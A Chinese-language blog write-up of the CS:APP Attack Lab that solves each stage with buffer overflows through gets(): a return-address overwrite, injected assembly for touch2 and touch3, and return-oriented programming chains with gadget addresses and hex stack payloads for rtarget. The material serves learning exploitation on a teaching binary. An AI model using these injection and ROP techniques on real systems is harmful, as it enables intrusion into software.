[lab]csapp-attack

Target1

本lab主要练习的是针对 gets 的缓存溢出攻击, 这里记录本人解题的过程和思路.

由于 gets 不能指定缓存大小, 因此在输入超过缓冲区后, 就会覆盖掉堆栈, 而堆栈存放的信息又十分关键, 特别是函数的返回地址, 因此我们可以轻易的覆盖为我们想要返回的地址, 进而达到攻击的目的.

不同于前几个 lab 十分直白, 这个 lab 的描述文件还是十分重要的, 也会有解题的思路.

它给出了 ctarget/rtarget 两个目标文件, 分别是两种不同的攻击方式, 它们都调用 gets 函数, lab 要求我们通过溢出攻击达到执行指定函数的目的

ctarget-touch1

这几个目标的入口流程都是一致的, getbuf 进行输入.

和bomb lab一样, 我们需要通过 objdump 对 elf文件获取汇编指令和地址.
根据提示, 我们要确定buf的长度, 和返回值覆盖到栈的位置.

00000000004017a8 <getbuf>:
  4017a8: 48 83 ec 28                  	subq	$40, %rsp
  4017ac: 48 89 e7                     	movq	%rsp, %rdi
  4017af: e8 8c 02 00 00               	callq	0x401a40 <Gets>
  4017b4: b8 01 00 00 00               	movl	$1, %eax
  4017b9: 48 83 c4 28                  	addq	$40, %rsp
  4017bd: c3                           	retq
  4017be: 90                           	nop
  4017bf: 90                           	nop

subq $40, %rsp 在栈上分配40字节的空间, touch1 要求我们执行 touch1 函数即可, 因此我们考虑输入40个任意字节, 然后输入 touch1 的地址, 这样retq 就会返回到touch1函数执行.

ctarget-touch2

相较于 touch1 , touch2 接受一个 int 参数, lab 要求参数是给定的cookie, 我们知道第一个参数是通过 %edi 传递的, 但继续覆盖缓冲区只能破坏到内存.

这是我们就需要利用输入的字符, 即直接编码后的汇编指令, 然后ret返回到缓冲区上, 达到执行任意指令的目的. 我们需要3条指令

mov    $0x59b997fa,%rdi   # 设置参数1 为 cookie
pushq  $0x4017ec          # 设置touch2 为跳转地址
ret                       # 跳转到 touch2

ctarget-touch3

touch3 接受参数从 int 变为了字符串, 思路与 touch2 类似, 我们将字符串也输入到 buf里, gdb x/s %rsp 查看字符串的地址, 然后将 rdi 设置成这个地址.

mov    $0x5561dc90,%rdi  # 字符串的开始地址
sub $40, %rsp # 这里要将我们的栈空间保留下来, 不然后面函数会覆盖掉
pushq  $0x4018fa 
ret # 跳转到 touch3

rtarget-touch2

rtarget 中, 启用了栈随机化(每次进入栈起始点都会不一样), 和地址保护(非代码区不能再当作指令解释), 我们向 buf 中注入汇编指令不再起作用, 描述文件提供了 return-oriented programming(ROP) 方法.

该方法的思路是, 虽然不能再注入汇编指令, 但因为指令是变长的, 指令序列的不同部分又可以解释为新指令, 我们可以利用现有代码的数据, 以 c3(ret) 为终点, 向前构造一个指令, 由于我们还是可以构造出自己想要的栈, 那么假如目标文件足够大, 包含足够多的指令, 我们还是可以从中构造出自己想要执行的指令序列.

这时就要使用 farm.c , 它包含了一系列看起来无意义的函数, 但我们可以根据上述思路从中重新构造可以执行的指令, 下面是我手动构造出来的所有可行 movq/popq 指令 (当然这一步也可以交给程序来扫描).

addval_273
4019a2: movq %rax %rdi

addval_219
4019ab: popq %rax

getval_481
4019dd: movl %eax %edx

addval_190
401a06: movq %rsp %rax

addval_436
401a13: movl %ecx %esi 

getval_159
401a34: movl %edx %ecx

我们首先要再一次 携带 cookie 调用 touch2, 根据提示我们只需要三条指令

popq %rax      # 将事先存在栈里的 cookie 取到 rax
movq %rax %rdi # rdi = rax
ret

因此构造出来的栈如下

... # 省略让缓冲区溢出的部分
ab 19 40 00 00 00 00 00 /* addr of 4019ab popq %rax  */
fa 97 b9 59 00 00 00 00 /* cookie */
a2 19 40 00 00 00 00 00 /* movq %rax %rdi */
ec 17 40 00 00 00 00 00 /* ret */

rtarget-touch3

这一步需要再次调用 touch3, 这里我搜索其他博客的做法, 发现除了提示给出的指令还需要一个能够做加法的指令, 因为我们的字符串存在了栈上, 需要相对地址来访问, 而 farm.c 里刚好有个函数满足我们的需求.

add_xy
4019d6: leaq	(%rdi,%rsi), %rax

现在涉及到的指令比较多, 我们将可以进行的寄存器间的赋值列一下

sp => ax => dx => cx => si
      ||
       => di
di+si => ax

可以di + si 就可以得到字符串地址, 再将它赋给 di 就行, 这里注意到si的链路有 movl, 不够复制地址, 因此 si 就是偏移量, di 就是 sp 原地址即可.

popq %ra
const dis to token string
movl %eax %edx
movl %edx %ecx
movl %ecx %esi  # si = offset
movq %rsp %rax
movq %rax %rdi  # rdi = sp
call add_xy    
movq %rax %rdi  # rdi = sp + offset
ret
token string

很有意思的一个lab, 也锻炼了gdb 查看内存的能力.